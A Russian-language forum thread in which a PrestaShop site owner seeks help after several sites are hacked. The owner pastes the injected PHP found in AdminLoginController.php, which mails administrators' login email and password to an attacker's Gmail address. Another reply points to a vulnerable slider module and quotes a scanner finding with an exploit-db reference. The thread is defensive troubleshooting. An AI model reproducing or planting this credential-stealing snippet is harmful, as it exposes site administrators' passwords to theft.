Взломан сайт на prestashop

[-SiGi-]

Коллеги, кто сталкивался со взломом сайта на prestashop?
У меня несколько сайтов на разных хостингах. Проблема со взомом за последний месяц на всех сайтах. От чего делаю вывод, что хостинг не виноват. В prestashop проблема. Может кто знает как защиться от взлома?

[Миколас]

С чего решил что сайты взломаны?
Свой комп проверь, может тебя взломали?

[-SiGi-]

В google предупреждение, что сайт угражает безопасности. У себя я в первую очередь все проверил.
На один сайт вообще пол-года незаходил, забросил его давно. Так и он взломан.

[DarinSr]

Проверьте файл /controllers/admin/AdminLoginController.php.

[-SiGi-]

Проверьте файл /controllers/admin/AdminLoginController.php.

Проверил. Там какой-то код

Код: [Выделить]

$to = "hooligans3assima@gmail.com";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <bajatax@hacked.com>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);Я так понимаю все мои пароли уже знают?

[Миколас]

Я так понимаю все мои пароли уже знают?

Правильно понимешь 
Меняй пароли. Нужно все проверить, неизвестно что еще тебе там оставили

[-SiGi-]

Я так понимаю все мои пароли уже знают?

Правильно понимешь 
Меняй пароли. Нужно все проверить, неизвестно что еще тебе там оставили

Спасибо, обрадовал.
А почему так произошло? Это баг в безопасности prestashop?

[Миколас]

Не за что, обращайся еще 
С prestashop были поблемки, но про AdminLoginController.php еще не слышал.
Логи смотртеть нужно, когда, кто, что менял и т.д.

[Adik]

А почему так произошло? Это баг в безопасности prestashop?

Не в движке проблема, в модулях.
У вас доп. модули установлены? Такие модули как revsliderprestashop, дают возможность взломать ваш сайт. Нужно регулярно обновлять, следить за обнаружением уязвимостей. Так совсем недавно была тема по revsliderprestashop, там писали

Код: [Выделить]

Критические замечания по модулю revsliderprestashop
Уязвимости в скриптах (1)
/public_html/modules/revsliderprestashop/inc_php/framework/image_view.class.php - AFU : REVSLIDER : http://www.exploit-db.com/exploits/35385/

[-SiGi-]

Adik, я не понял, что с этим делать? Можете подробнее объяснить?

[coder]

http://prestashop-forum.ru/index.php/topic,6913.0.html